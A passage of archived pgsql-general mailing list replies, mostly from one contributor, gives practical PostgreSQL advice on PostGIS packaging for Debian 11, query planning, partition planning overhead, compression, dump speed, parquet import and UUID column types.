> malicious activity, human error and technology failure; and to lead the
> movement toward building a more resilient world. To find out more, visit
> our website.
>
>
>
>
>


Re: Question about attention to pgsql-hack...@lists.postgresql.org

2022-06-27 Thread Imre Samu
From the original post:
"-This whole system will uphold any precision, certainly ones within a very
large range limit, controlled by the already available type for large
positive integers, the BIGINT. It can thereby enumerate digits within the
range of
(+/-)1 to (+/-)9,223,372,036,854,775,807. This is at least between one and
positive nine quintilion digit places. More than enough for the speed and
scope of today, or maybe tomorrow, and the Desktop PC, as either a client
or a server."

As I know PostgreSQL 14 "field" size upper limit : 1 GB   ~=  1 000 000 000
byte  ( 1 byte --> 2 digits )
so this is a hard limitation on the PostgreSQL side.
https://www.postgresql.org/docs/current/limits.html

proposal for the first iteration:
- just using the Postgres "numeric" type (  "up to 131072 digits before the
decimal point; up to 16383 digits after the decimal point" )
  and it will be so much easier.
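
A quick illustration of the numeric type's arbitrary precision:

SELECT repeat('9', 1000)::numeric + 1;   -- exact 1001-digit result
SELECT factorial(100);                   -- exact 158-digit result, returned as numeric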

> I was wondering if anyone can or will pay some active attention to it?

Why is this important to you?
How do you expect to contribute to the proposed project?
What technical background do you have?

Regards,
 Imre


A Z  wrote (on Sun, Jun 26, 2022, 12:37):

> Dear pgsql-general,
>
> I have successfully sent an (updated) email list message to
>
> *pgsql-hack...@lists.postgresql.org *
>
> which can be viewed in the archive here:
>
>
> https://www.postgresql.org/message-id/Rm7WBtZZpYL1NWuunuN_16EY0JcyejqV22z_JlUfvD5FYPenGDd_ZGUddwAcMNi2KNSyvqAhBRzj2JxtJoNmWAzykBQU4Z1AzBp0GPs8wZQ=@protonmail.com
>
> I was wondering if anyone can or will pay some active attention to it?
> i.e. what can I do from here to raise the message there to the attention
> of more people involved with pgsql-hackers, in order to get one or more
> active email replies in response to what I have posed/asked?
>
> *My email address is powerus...@live.com.au *,
>
> and my online name for the post is
>
> *Sergio Minervini*.
>
>
>


Re: postgis

2022-07-19 Thread Imre Samu
> I would like to install postgis 3.04 on a debian 11
> postgres 12.
> I may use whatever repo.
> I install postgres from postgresql.org...

As far as I can see, from the official postgresql.org debian11 repo
you can only install the "postgresql-12-postgis-3" package  ( now:
PostGIS = 3.2.1 ):

docker run -it --rm postgres:12 bash
  apt update && apt search postgis | grep postgresql-12-postgis-3
   ---> postgresql-12-postgis-3/bullseye-pgdg 3.2.1+dfsg-1.pgdg110+1 amd64
  cat /etc/os-release | grep VERSION
   ---> VERSION="11 (bullseye)"

Currently the latest 3.0.x version is 3.0.5: http://postgis.net/2022/02/02/postgis-3.0.5/

regards,
  Imre

Marc Millas  wrote (on Mon, Jul 18, 2022, 20:48):

> Hi,
> postgres 12.
> I may use whatever repo.
>
> I install postgres from postgresql.org...
>
>
>
> Marc MILLAS
> Senior Architect
> +33607850334
> www.mokadb.com
>
>
>
> On Mon, Jul 18, 2022 at 7:15 PM Adrian Klaver 
> wrote:
>
>> On 7/18/22 10:08, Marc Millas wrote:
>> > Hi,
>> >
>> > I would like to install postgis 3.04 on a debian 11.
>> >
>> > digging into various web sites, I didnt found the name of that packet.
>> >
>> > can someone help ?
>>
>> Should have added to previous response, what version of Postgres?
>> >
>> > thanks
>> >
>> > Marc MILLAS
>> > Senior Architect
>> > +33607850334
>> > www.mokadb.com 
>> >
>>
>>
>> --
>> Adrian Klaver
>> adrian.kla...@aklaver.com
>>
>


Re: postgis

2022-07-19 Thread Imre Samu
> from your message, I understand that for debian 11, I can NOT get any
> 3.0.x version.

I can't see any PostGIS 3.0.x version
in the default "http://apt.postgresql.org/pub/repos/apt/ bullseye-pgdg main 12" repo:

root@6b22a4450d93:/# cat /etc/apt/sources.list.d/pgdg.list
deb [ signed-by=/usr/local/share/keyrings/postgres.gpg.asc ] http://apt.postgresql.org/pub/repos/apt/ bullseye-pgdg main 12

If the version of PostGIS(3.0.x) is important for compatibility,
you should also pay attention to the version of the "geos" and "proj"
packages.

As I understand it, the debian "postgresql-12-postgis-3" package is
continuously updated to the latest official PostGIS version
( postgis 3.0 -> postgis 3.1 -> postgis 3.2 ... ),
and the latest update was on 2022-02-14:
https://www.postgresql.org/message-id/e1njy2b-0006m6...@atalia.postgresql.org


( My knowledge is limited .. )
There is a dedicated PostGIS mailing list:
-  https://lists.osgeo.org/mailman/listinfo/postgis-users
and a Debian packaging mailing list:
- https://www.postgresql.org/list/pgsql-pkg-debian/

Regards,
 Imre



Marc Millas  wrote (on Tue, Jul 19, 2022, 20:20):

> Hi,
>
> from your message, I understand that for debian 11, I can NOT get any
> 3.0.x version.
> right ?
>
> Marc MILLAS
> Senior Architect
> +33607850334
> www.mokadb.com
>
>
>
> On Tue, Jul 19, 2022 at 7:20 PM Imre Samu  wrote:
>
>> > I would like to install postgis 3.04 on a debian 11
>> > postgres 12.
>> > I may use whatever repo.
>> > I install postgres from postgresql.org...
>>
>> As I see - from the official postgresql.org debian11 repo,
>> you can only install the "postgresql-12-postgis-3" package  ( now:
>> Postgis=3.2.1 )
>>
>> docker run -it --rm postgres:12 bash
>>   apt update && apt search postgis | grep postgresql-12-postgis-3
>>---> *postgresql-12-postgis-3/bullseye-pgdg 3.2.1+dfsg-1.pgdg110+1
>> amd64*
>>   cat /etc/os-release | grep VERSION
>>---> VERSION="11 (bullseye)
>>
>> Now the latest 3.0 version is
>> http://postgis.net/2022/02/02/postgis-3.0.5/
>>
>> regards,
>>   Imre
>>
>> Marc Millas  wrote (on Mon, Jul 18, 2022, 20:48):
>>
>>> Hi,
>>> postgres 12.
>>> I may use whatever repo.
>>>
>>> I install postgres from postgresql.org...
>>>
>>>
>>>
>>> Marc MILLAS
>>> Senior Architect
>>> +33607850334
>>> www.mokadb.com
>>>
>>>
>>>
>>> On Mon, Jul 18, 2022 at 7:15 PM Adrian Klaver 
>>> wrote:
>>>
>>>> On 7/18/22 10:08, Marc Millas wrote:
>>>> > Hi,
>>>> >
>>>> > I would like to install postgis 3.04 on a debian 11.
>>>> >
>>>> > digging into various web sites, I didnt found the name of that packet.
>>>> >
>>>> > can someone help ?
>>>>
>>>> Should have added to previous response, what version of Postgres?
>>>> >
>>>> > thanks
>>>> >
>>>> > Marc MILLAS
>>>> > Senior Architect
>>>> > +33607850334
>>>> > www.mokadb.com <http://www.mokadb.com>
>>>> >
>>>>
>>>>
>>>> --
>>>> Adrian Klaver
>>>> adrian.kla...@aklaver.com
>>>>
>>>


Re: postgis

2022-07-20 Thread Imre Samu
> My general impression is that the packaging, at least for Debian,
> doesn’t actually understand how the PostGIS project handles versioning
> support.
> But i may be missing something

"PostGIS Pre-built Binary Distributions for various OS"
--->  https://trac.osgeo.org/postgis/wiki/UsersWikiPackages

Debian is a conservative Linux distribution.

IMHO:
Packaging is not so easy [
https://trac.osgeo.org/postgis/wiki/UsersWikiPostgreSQLPostGIS  ]:
- there are [n.=7] Postgres versions [9.6,10,11,12,13,14,15]   [ now: all
supported in bullseye ]
- there are [g.=9] Geos versions [3.3,3.4,3.5,3.6,3.7,3.8,3.9,3.10,3.11]  [
now: bullseye = 3.9.0 ]
- there are [p.=7] Proj versions [ 4.8,4.9,5.x,6.x,7.x,8.x,9.x ]  [ now:
bullseye = 7.2.1 ]
- there are [d.=7] Gdal versions [ 2.4,3.0,3.1,3.2,3.3,3.4,3.5 ]  [ now:
bullseye = 3.2.2 ]
- there are [m.=5] Postgis versions [2.4,2.5,3.0,3.1,3.2,3.3]   [ now:
bullseye = 3.2.1 ]

And there are also projects based on PostGIS:
- Pgrouting [r.=7]   [2.3,2.4,2.5,2.6,3.0,3.1,3.2,3.3]  [ now:
bullseye = 3.3.0 ; postgresql-12-pgrouting ]

So the ideal "end user" combination =  n*g*p*d*m*r  = 7*9*7*7*5*7  = 108045

// disclaimer:   I am a Postgis user and a
https://github.com/postgis/docker-postgis contributor

Regards,
 Imre


David G. Johnston  wrote (on Wed, Jul 20, 2022, 16:58):

> On Wednesday, July 20, 2022, Marc Millas  wrote:
>
>> Thanks for your answer.
>> I would like to avoid compiling as much as possible.
>> I know that postgis 3.2.1 is available and does install without pb. but..
>> That db run an app which is very long to test, so I need to stick to a
>> postgis 3.0.x
>>
>
> I’m not particularly fluent here but working from the PostGIS project
> homepage and into the linked package archives I do not see where what you
> want exists.  It doesn’t seem like the 3.0.x series is being kept
> up-to-date in packaged form.
>
> But you may want to use PostGIS support channels to have a better chance
> at getting confirmation/help rather than here.
>
> My general impression is that the packaging, at least for Debian, doesn’t
> actually understand how the PostGIS project handles versioning support.
> But i may be missing something as I’m doing this web-only and
> apt.postgresql.org is basically impossible to inspect on the web.
>
> David J.
>
>


Re: postgis

2022-07-20 Thread Imre Samu
>  I would expect the 35 packages implied by the version policies of those
>  two projects.

Based on my docker-postgis support experience, the "geos" version is also important.
The current Bullseye (Debian 11) geos version is 3.9, and this is likely to stay
until the end of the cycle ( so no upgrade to 3.10 / 3.11 is expected ).

And the (next) PostGIS 3.3.0 release does not enable all new features
with the current Bullseye Geos version:
https://git.osgeo.org/gitea/postgis/postgis/raw/tag/3.3.0beta2/NEWS

"This version requires PostgreSQL 11 or higher, GEOS 3.6 or higher, and
Proj 5.2+.

Additional features are enabled if you are running GEOS 3.9+,
ST_MakeValid enhancements with 3.10+,
numerous additional enhancements with GEOS 3.11+.
Requires SFCGAL 1.4.1+ for ST_AlphaShape and ST_OptimalAlphaShape."

And PostGIS 3.2 also has some enhancements that work only with geos 3.10+
( ST_MakeValid enhancements ).
And "Bookworm" (Debian 12) is expected >= mid-2023,
so it is not easy ...

Imre


David G. Johnston  wrote (on Wed, Jul 20, 2022, 18:31):

> On Wed, Jul 20, 2022 at 9:21 AM Imre Samu  wrote:
>
>> > My general impression is that the packaging, at least for Debian,
>> > doesn’t actually understand how the PostGIS project handles versioning
>> support.
>> > But i may be missing something
>>
>> "PostGIS Pre-built Binary Distributions for various OS"
>> --->  https://trac.osgeo.org/postgis/wiki/UsersWikiPackages
>>
>> Debian is a conservative Linux.
>>
>> IMHO:
>> Packaging is not so easy, [
>> https://trac.osgeo.org/postgis/wiki/UsersWikiPostgreSQLPostGIS  ]
>> - there are [n.=7] Postgres version [9.6,10,11,12,13,14,15 ]   [ now: all
>> supported in bullseye ]
>> - there are [g.=9 ] Geos version [3.3,3.4,3.5,3.6,3.7,3.8,3.9,3.10,3.11]
>> [ now: bullsey= 3.9.0 ]
>> - there are [p.=7 ] Proj version [ 4.8,4.9,5.x,6.x,7.x,8.x,9.x ][
>> now: bullseye = 7.2.1 ]
>> - there are [d.= 7 ] Gdal version [ 2.4,3.0,3.1,3.2,3.3,3.4,3.5][
>> now: bullseye = 3.2.2 ]
>> - there are [m.=5] Postgis version [2.4,2.5,3.0,3.1,3.2,3.3]   [now:
>> bullseye= 3.2.1 ]
>>
>> And there are also projects based on PostGIS.
>> - Pgrouting [r.=7 ]   [2.3,2.4,2.5,2.6,3.0,3.1,3.2,3.3]  [ now:
>> bullseye= 3.3.0 ; postgresql-12-pgrouting ]
>>
>> So the ideal "end user" combination =  n*g*p*d*m*r  = 7*9*7*7*5*7  =
>> 108045
>>
>> // disclaimer:   I am a Postgis user and a
>> https://github.com/postgis/docker-postgis contributor
>>
>>>
>>>
> Yes, my expectation may be naive, but as the package name is
> "postgresql-[version]-postgis-[version]" I would expect the 35 packages
> implied by the version policies of those two projects.  So that one can
> choose their combination and focus on patch releases within those two named
> projects.  The OP seems to as well.  Or maybe a functional subset so that
> some number less than 35 may exist but, say, you cannot combine v14 and 3.0
> since 3.0 since 3.2 was the most recent release of PostGIS when PostgreSQL
> v14 came out.
>
> In any case it does sound like the request by the OP is not something the
> community has chosen to provide.  Which means a choice on their part - move
> up PostGIS or compile from source.
>
> David J.
>
>
>


Re: Same query, same data different plan

2022-10-10 Thread Imre Samu
> Ran analyze on both. Running the same query I'm getting different plans,
> one x10 slower.

A theory:

IF the "statistics target" is too low,
THEN
a different random sample --> different statistics --> a different plan.

"For large tables, ANALYZE takes a random sample of the table contents,
rather than examining every row."
https://www.postgresql.org/docs/current/sql-analyze.html

IMHO: Try increasing the statistics target
( "default_statistics_target", or per column - see the sketch below ).

regards,
  Imre

Kostas Papadopoulos  wrote (on Mon, Oct 10, 2022, 14:56):

>
> I have two identical databases running in the same instance of Postgresql.
> Ran
> analyze on both. Running the same query I'm getting different plans, one
> x10 slower.
> Although I have solved my problem by re-writing the query, I want to
> understand why
> this is happening. If the configuration, Postgresql version, schema and
> data are the
> same, what other factors is the planner considering?
>
> --
>
> Kostas Papadopoulos
> KE MethodosIT
>
>
>
>


Re: partition table slow planning

2019-07-24 Thread Imre Samu
> Can we know why this is happening?

Please give us more info about your system:
- PG version?
- number of partitions?
- anything else important?

For example, in the PG 11.2 changes:
"Improve planning speed for large inheritance or partitioning table groups
(Amit Langote, Etsuro Fujita)"
https://www.postgresql.org/docs/current/release-11-2.html

Imre

Jatinder Sandhu  wrote (on Wed, Jul 24, 2019, 9:22):

>
>
> We encounter a issue when we do query on partition table directly with
> proper partition key provide. postgres able to find problem partition but
> when I do explain plan it showing 95% spend on planning the execution .
> Here is example
> itinerary=# EXPLAIN ANALYZE SELECT * FROM itinerary WHERE destination
> ='GRJ' AND departure_date = '2020-01-01' AND month_day = 101
> itinerary-# ;
>
> QUERY PLAN
>
> ---
>  Append  (cost=0.29..13.79 rows=11 width=1024) (actual time=0.033..0.037
> rows=1 loops=1)
>->  Index Scan using itinerary_101_destination_departure_date_idx on
> itinerary_101  (cost=0.29..13.73 rows=11 width=1024) (actual
> time=0.033..0.036 rows=1 loops=1)
>  Index Cond: (((destination)::text = 'GRJ'::text) AND
> ((departure_date)::text = '2020-01-01'::text))
>  Filter: (month_day = 101)
>
>  Planning Time: 51.677 ms
>  Execution Time: 0.086 ms
>
>
> When  I do query on directly on the partition table it is quite fast
> itinerary=# EXPLAIN ANALYZE SELECT * FROM itinerary_101 WHERE destination
> ='GRJ' AND departure_date = '2020-01-01' AND month_day = 101
> itinerary-# ;
>
>  QUERY PLAN
>
> -
>  Index Scan using itinerary_101_destination_departure_date_idx on
> itinerary_101  (cost=0.29..13.73 rows=11 width=1024) (actual
> time=0.043..0.048 rows=1 loops=1)
>Index Cond: (((destination)::text = 'GRJ'::text) AND
> ((departure_date)::text = '2020-01-01'::text))
>Filter: (month_day = 101)
>
>  Planning Time: 0.191 ms
>  Execution Time: 0.074 ms
> (5 rows)
>
> itinerary=#
>
> *Can we know why this is happening?*
>
>
>
>
>
>


Re: partition table slow planning

2019-07-24 Thread Imre Samu
> PostgreSQL 11.3 ...   Total number of partition is 367  Partition
> key: LIST

As far as I know,
from the PG11 "Declarative Partitioning Best Practices":
... "The query planner is generally able to handle partition hierarchies
with up to a few hundred partitions fairly well, provided that typical
queries allow the query planner to prune all but a small number of
partitions. Planning times become longer and memory consumption becomes
higher as more partitions are added."
... "in this case, it may be better to choose to partition by HASH and
choose a reasonable number of partitions rather than trying to partition by
LIST"
... "Never assume that more partitions are better than fewer partitions
and vice-versa."

https://www.postgresql.org/docs/11/ddl-partitioning.html#DDL-PARTITIONING-DECLARATIVE-BEST-PRACTICES
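
For reference, a hedged sketch (not from the thread) of the HASH alternative mentioned
in the quote above, using the month_day partition key from the table definition below;
the table/partition names and the modulus of 32 are arbitrary choices:

CREATE TABLE itinerary_hash (
    destination    varchar(5)  NOT NULL,
    departure_date varchar(10) NOT NULL,
    month_day      integer     NOT NULL
    -- ... remaining columns ...
) PARTITION BY HASH (month_day);

CREATE TABLE itinerary_hash_p0 PARTITION OF itinerary_hash
    FOR VALUES WITH (MODULUS 32, REMAINDER 0);
CREATE TABLE itinerary_hash_p1 PARTITION OF itinerary_hash
    FOR VALUES WITH (MODULUS 32, REMAINDER 1);
-- ... and so on up to REMAINDER 31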


In PG12 this is more optimized:

Changes: "Improve performance of many operations on partitioned tables
(Amit Langote, David Rowley, Tom Lane, Álvaro Herrera): Allow tables with
thousands of child partitions to be processed efficiently by operations
that only affect a small number of partitions."
https://www.postgresql.org/docs/12/release-12.html#id-1.11.6.5.5
see more:
https://www.postgresql.org/message-id/flat/9d7c5112-cb99-6a47-d3be-cf1ee6862...@lab.ntt.co.jp


Imre





Jatinder Sandhu  wrote (on Wed, Jul 24, 2019, 16:40):

>  PostgreSQL 11.3 (Ubuntu 11.3-1.pgdg18.04+1) on x86_64-pc-linux-gnu,
> compiled by gcc (Ubuntu 7.4.0-1ubuntu1~18.04) 7.4.0, 64-bit'
> Total number of partition is 367
>
> Parent table defination
>
>Table "public.itinerary"
>   Column   |Type | Collation | Nullable |
> Default
>
> ---+-+---+--+-
>  flight_query  | character varying(50)   |   | not null |
>  origin| character varying(5)|   | not null |
>  destination   | character varying(5)|   | not null |
>  departure_date| character varying(10)   |   | not null |
>  month_day | integer |   | not null |
>  journeys  | character varying(10485760) |   | not null |
>  origin_metro  | character varying(5)|   |  |
>  destination_metro | character varying(5)|   |  |
> Partition key: LIST (month_day)
>
>
>
> On Wed, Jul 24, 2019 at 5:16 AM Imre Samu  wrote:
>
>> >*Can we know why this is happening?*
>>
>> Please give us - more info about your system:
>> - PG version?
>> - number of partitions?
>> - any other important?
>>
>> for example - in PG 11.2 Changes:
>> "Improve planning speed for large inheritance or partitioning table
>> groups (Amit Langote, Etsuro Fujita)"
>> https://www.postgresql.org/docs/current/release-11-2.html
>>
>> Imre
>>
>> Jatinder Sandhu  wrote (on Wed, Jul 24, 2019, 9:22):
>>
>>>
>>>
>>> We encounter a issue when we do query on partition table directly with
>>> proper partition key provide. postgres able to find problem partition but
>>> when I do explain plan it showing 95% spend on planning the execution .
>>> Here is example
>>> itinerary=# EXPLAIN ANALYZE SELECT * FROM itinerary WHERE destination
>>> ='GRJ' AND departure_date = '2020-01-01' AND month_day = 101
>>> itinerary-# ;
>>>
>>>   QUERY PLAN
>>>
>>> ---
>>>  Append  (cost=0.29..13.79 rows=11 width=1024) (actual time=0.033..0.037
>>> rows=1 loops=1)
>>>->  Index Scan using itinerary_101_destination_departure_date_idx on
>>> itinerary_101  (cost=0.29..13.73 rows=11 width=1024) (actual
>>> time=0.033..0.036 rows=1 loops=1)
>>>  Index Cond: (((destination)::text = 'GRJ'::text) AND
>>> ((departure_date)::text = '2020-01-01'::text))
>>>  Filter: (month_day = 101)
>>>
>>>  Planning Time: 51.677 ms
>>>  Execution Time: 0.086 ms
>>>
>>>
>>> When  I do query on directly on the partition table it is quite fast
>>> itinerary=# EXPLAIN ANALYZE SELECT * FROM itinerary_101 WHERE
>>> destination ='GRJ' AND departure_date = '2020-01-01' AND month_day = 101
>>> itinerary-# ;
>>>
>>>QUERY PLAN
>>>
>>&

Re: Compression In Postgresql 9.6

2019-08-05 Thread Imre Samu
> because of specs of blockchain component.

Based on this schema (
https://grisha.org/blog/2017/12/15/blockchain-and-postgres/  AND
https://github.com/blkchain/pg_blkchain  ):
IF your blockchain component is using BYTEA everywhere  ( the binary data
type: https://www.postgresql.org/docs/9.6/datatype-binary.html ),
THEN ( imho ) you can't expect a lot of space saving.

>  Rhel 7.6.  . ...   There is a requirement for data compression

On RedHat (>=7.5) you can test the new VDO compression layer:
https://www.redhat.com/en/blog/look-vdo-new-linux-compression-layer
It was mentioned here a few weeks ago: "... VDO compression for tables that are
less update intensive."
https://www.postgresql.org/message-id/20190718173424.gb25...@aart.rice.edu

On the Postgres level, you can enable "wal_compression" ( a minimal sketch below ):
-  https://www.postgresql.org/docs/9.6/runtime-config-wal.html
-  https://www.endpoint.com/blog/2017/03/28/postgres-wal-files-best-compression
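
A minimal sketch ( wal_compression only needs a reload, not a restart ):

ALTER SYSTEM SET wal_compression = on;
SELECT pg_reload_conf();
SHOW wal_compression;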



regards,
Imre


Shital A  wrote (on Mon, Aug 5, 2019, 8:30):

> Hello,
>
> Need inputs on below:
>
> We are working on a setting up a new highly transactional (tps 100k) OLTP
> system for payments using blockchain and postgresql 9.6 as DB on Rhel 7.6.
> Postgres version is 9.6 and not latest because of specs of blockchain
> component.
>
> There is a requirement for data compression on DB level. Please provide
> your inputs on how this can be best achieved.
>
> Checked in-build Toast, it compressed the data provided exceed the 2kb
> pagesize? If the data values are small and even if there are billion
> records they wont be compressed, this is what I understood.
>
> Are there any suggestions of compressing older data irrespective of row
> size transparently?
>
> Thanks.
>


Re: Slow statement using parallelism after 9.6>11 upgrade

2019-09-03 Thread Imre Samu
> We have upgraded our database from 9.6 to 11

Is this now the latest PG?  PG 11.5?
( for example, PG 11.5 fixed: "Fix failure to resolve deadlocks
involving multiple parallel worker processes"
https://www.postgresql.org/docs/current/release-11-5.html )

> populated by the osm2pgsql program and updated on a daily basis.
> What runtime setting should I change to fix this, without losing the
> benefit of parallelism ?

- osm2pgsql has its own parallelization ( osm2pgsql --number-processes .. ),
   so be careful about adding more parallelism on the PG side while keeping the same
osm2pgsql parameters!   ( check the memory usage! )
- check the benchmarks and the tunings:
https://wiki.openstreetmap.org/wiki/Osm2pgsql/benchmarks
- you can ask for help on the "osm dev mailing list" ( = "dev OpenStreetMap
developer discussion" https://lists.openstreetmap.org/listinfo/dev )

Imre




Arnaud L.  wrote (on Tue, Sep 3, 2019, 14:11):

> Hi list
>
> We have upgraded our database from 9.6 to 11 (and updated PostGIS from
> 2.3 to 2.5 as well).
> We are using it among other things to store an OpenStreetMap database,
> populated by the osm2pgsql program and updated on a daily basis.
>
> The process used to take ~1h30 minutes before the upgrade, but after the
> upgrade it looks like it will never run to completion in a 24h time frame.
>
> The problem is apparently that the planner choses to run some statements
> in parallel, but these take a lot longer than when run without it.
> Here are the to explain analyze of the same statement, with parallelism
> on and off :
>
> Statement :
> PREPARE mark_ways_by_node(int8) AS select id from planet_osm_ways WHERE
> nodes && ARRAY[$1];
> EXPLAIN EXECUTE mark_ways_by_node(1);
>
>
> max_parallel_workers_per_gather = 2 :
>
> Gather  (cost=12545.61..2357352.25 rows=1420982 width=8) (actual
> time=2.577..64.028 rows=1 loops=1)
>Workers Planned: 2
>Workers Launched: 2
>->  Parallel Bitmap Heap Scan on planet_osm_ways
> (cost=11545.61..2214254.05 rows=592076 width=8) (actual
> time=0.213..0.213 rows=0 loops=3)
>  Recheck Cond: (nodes && '{1}'::bigint[])
>  Heap Blocks: exact=1
>  ->  Bitmap Index Scan on planet_osm_ways_nodes_idx
> (cost=0.00..11190.36 rows=1420982 width=0) (actual time=0.173..0.174
> rows=1 loops=1)
>Index Cond: (nodes && '{1}'::bigint[])
> Planning Time: 8.596 ms
> Execution Time: 64.135 ms
>
>
> max_parallel_workers_per_gather = 0 :
>
> Bitmap Heap Scan on planet_osm_ways  (cost=11545.61..3462154.46
> rows=1420982 width=8) (actual time=0.677..0.679 rows=1 loops=1)
>Recheck Cond: (nodes && '{1}'::bigint[])
>Heap Blocks: exact=1
>->  Bitmap Index Scan on planet_osm_ways_nodes_idx
> (cost=0.00..11190.36 rows=1420982 width=0) (actual time=0.268..0.268
> rows=1 loops=1)
>  Index Cond: (nodes && '{1}'::bigint[])
> Planning Time: 0.193 ms
> Execution Time: 0.773 ms
>
>
> So this Parallel Bitmap Heap Scan seems to be quite problematic here.
> What runtime setting should I change to fix this, without losing the
> benefit of parallelism ?
>
> Thanks a lot !
>
> Cheers
> --
> Arnaud
>
>
>


Re: Redis 16 times faster than Postgres?

2019-09-30 Thread Imre Samu
from the original article:
> For example, the PostgreSQL speeds depend on the Django ORM code
> that makes the SQL and sends the query and then turns it into the model
> instance.
> I don't know what the proportions are between that and
> the actual bytes-from-PG's-disk times. But I'm not sure I care either.

imho:   the "Django ORM" is not so fast.
according to "TechEmpower Web Framework Benchmarks" ...
it has only  ~3% performance  -  compare to the best rust+pg (100%) results.

example:
"Data updates"
https://www.techempower.com/benchmarks/#section=data-r18&hw=ph&test=update
the "django-postgresql" performance = 766   - only 3.0% of the best pg +
rust results
checking the other test types (  "Single query" ;" Multiple queries" ) has
a similar results.

the Django implementation of the test:
https://github.com/TechEmpower/FrameworkBenchmarks/tree/master/frameworks/Python/django

Imre


Colin 't Hart  ezt írta (időpont: 2019. szept. 29.,
V, 23:42):

> Hi,
>
> Can someone take a look at this blog post?
> https://www.peterbe.com/plog/redis-vs-postgres-blob-of-json
>
> Can Redis really be 16 times faster than Postgres? Surely Postgres can get
> closer to the raw speed of the hardware than 1 order of magnitude?
>
> Thanks,
>
> Colin
>


Re: Regarding db dump with Fc taking very long time to completion

2019-10-16 Thread Imre Samu
Hi,

Maybe you can reuse these backup tricks.

"Speeding up dump/restore process"
https://www.depesz.com/2009/09/19/speeding-up-dumprestore-process/

for example:
"""
*Idea was: All these tables had primary key based on serial. We could
easily get min and max value of the primary key column, and then split it
into half-a-million-ids “partitions", then dump them separately using:*
*psql -qAt -c "COPY ( SELECT * FROM TABLE WHERE id BETWEEN x AND y) TO
STDOUT" | gzip -c - > TABLE.x.y.dump*
"""

best,
Imre



Durgamahesh Manne  ezt írta (időpont: 2019. aug.
30., P, 11:51):

> Hi
> To respected international postgresql team
>
> I am using postgresql 11.4 version
> I have scheduled logical dump job which runs daily one time at db level
> There was one table that has write intensive activity for every 40 seconds
> in db
> The size of the table is about 88GB
>  Logical dump of that table is taking more than 7 hours to be completed
>
>  I need to reduce to dump time of that table that has 88GB in size
>
>
> Regards
> Durgamahesh Manne
>
>
>
>


Re: How to import Apache parquet files?

2019-11-05 Thread Imre Samu
>I would like to import (lots of) Apache parquet files to a PostgreSQL 11
cluster

imho: You have to check and test parquet_fdw ( the Parquet Foreign Data
Wrapper ) - https://github.com/adjust/parquet_fdw
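
A minimal sketch of the setup, based on the parquet_fdw README - the table
definition and the file path are examples, the column types must match the
parquet schema, and depending on the version you may also need a CREATE
USER MAPPING:

  CREATE EXTENSION parquet_fdw;
  CREATE SERVER parquet_srv FOREIGN DATA WRAPPER parquet_fdw;

  CREATE FOREIGN TABLE userdata (
      id         int,
      first_name text,
      last_name  text
  )
  SERVER parquet_srv
  OPTIONS (filename '/data/userdata1.parquet');

  -- a plain INSERT ... SELECT then copies the rows into a regular table
  -- (assuming a table userdata_local with the same columns already exists)
  INSERT INTO userdata_local SELECT * FROM userdata;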

Imre




Softwarelimits  ezt írta (időpont: 2019. nov. 5.,
K, 15:57):

> Hi, I need to come and ask here, I did not find enough information so I
> hope I am just having a bad day or somebody is censoring my search results
> for fun... :)
>
> I would like to import (lots of) Apache parquet files to a PostgreSQL 11
> cluster - yes, I believe it should be done with the Python pyarrow module,
> but before digging into the possible traps I would like to ask here if
> there is some common, well understood and documented tool that may be
> helpful with that process?
>
> It seems that the COPY command can import binary data, but I am not able
> to allocate enough resources to understand how to implement a parquet file
> import with that.
>
> I really would like follow a person with much more knowledge than me about
> either PostgreSQL or Apache parquet format instead of inventing a bad
> wheel.
>
> Any hints very welcome,
> thank you very much for your attention!
> John
>


Re: How should I specify work_mem/max_worker_processes if I want to do big queries now and then?

2019-11-21 Thread Imre Samu
>  uuid character varying(45) NOT NULL,

Just a comment.
IF this is a real UUID ( RFC 4122, ISO/IEC 9834-8:2005 ),
THEN you can use the built-in "UUID Type":
https://www.postgresql.org/docs/11/datatype-uuid.html

"UUID would be the fastest because its 128 bits -> 16 bytes and
comparisons are done numerically."
https://stackoverflow.com/questions/32189129/performance-difference-between-uuid-char-and-varchar-in-postgresql-table

The smaller size is also important for your index:  "quotes_pkey
PRIMARY KEY (symbol_id, uuid);"
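
A minimal sketch of the conversion - it assumes every existing value in
quotes.uuid is a valid RFC 4122 string (otherwise the cast fails), and it
rewrites the table and its primary key, so test it on a copy first:

  ALTER TABLE public.quotes
      ALTER COLUMN uuid TYPE uuid USING uuid::uuid;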

Imre


James(王旭)  ezt írta (időpont: 2019. nov. 20., Sze, 9:23):

>
> This is the schema:
>
> CREATE TABLE public.quotes (
> uuid character varying(45) NOT NULL,
> symbol_id smallint NOT NULL,
> symbol character varying(32) NOT NULL,
> p_open real NOT NULL,
> p_high real NOT NULL,
> p_low real NOT NULL,
> p_close real NOT NULL,
> amount numeric(20,2) NOT NULL,
> volume numeric(20,2) NOT NULL,
> pubdate timestamp with time zone NOT NULL,
> chunk_id smallint NOT NULL
> )
> PARTITION BY HASH (symbol_id);
> ALTER TABLE ONLY public.quotes
> ADD CONSTRAINT quotes_pkey PRIMARY KEY (symbol_id, uuid);
> CREATE INDEX idx_201911 ON ONLY public.quotes USING btree (symbol,
> chunk_id) WHERE (chunk_id >= 2595);
>
> 
>
> This is explain:
>
> EXPLAIN (ANALYZE, BUFFERS)  select p_open,p_close,p_high,p_low from quotes
> where symbol='MSFT' and chunk_id >= 2595;
>
>QUERY PLAN
>
>
> ---
> --
>  Append  (cost=0.42..22961.77 rows=12203 width=16) (actual
> time=1091.462..19600.454 rows=13286 loops=1)
>Buffers: shared hit=9 read=10065
>->  Index Scan using quotes_0_symbol_chunk_id_idx1 on quotes_0
> (cost=0.42..8.44 rows=1 width=16) (act
> ual time=0.295..0.295 rows=0 loops=1)
>  Index Cond: ((symbol)::text = 'MSFT'::text)
>  Buffers: shared hit=2 read=1
>->  Index Scan using quotes_1_symbol_chunk_id_idx1 on quotes_1
> (cost=0.42..8.44 rows=1 width=16) (act
> ual time=0.137..0.137 rows=0 loops=1)
>  Index Cond: ((symbol)::text = 'MSFT'::text)
>  Buffers: shared hit=2 read=1
>->  Index Scan using quotes_2_symbol_chunk_id_idx1 on quotes_2
> (cost=0.42..8.44 rows=1 width=16) (act
> ual time=0.117..0.117 rows=0 loops=1)
>  Index Cond: ((symbol)::text = 'MSFT'::text)
>  Buffers: shared hit=2 read=1
>->  Index Scan using quotes_3_symbol_chunk_id_idx1 on quotes_3
> (cost=0.42..8.44 rows=1 width=16) (act
> ual time=0.072..0.072 rows=0 loops=1)
>  Index Cond: ((symbol)::text = 'MSFT'::text)
>  Buffers: shared hit=3
>->  Index Scan using quotes_4_symbol_chunk_id_idx1 on quotes_4
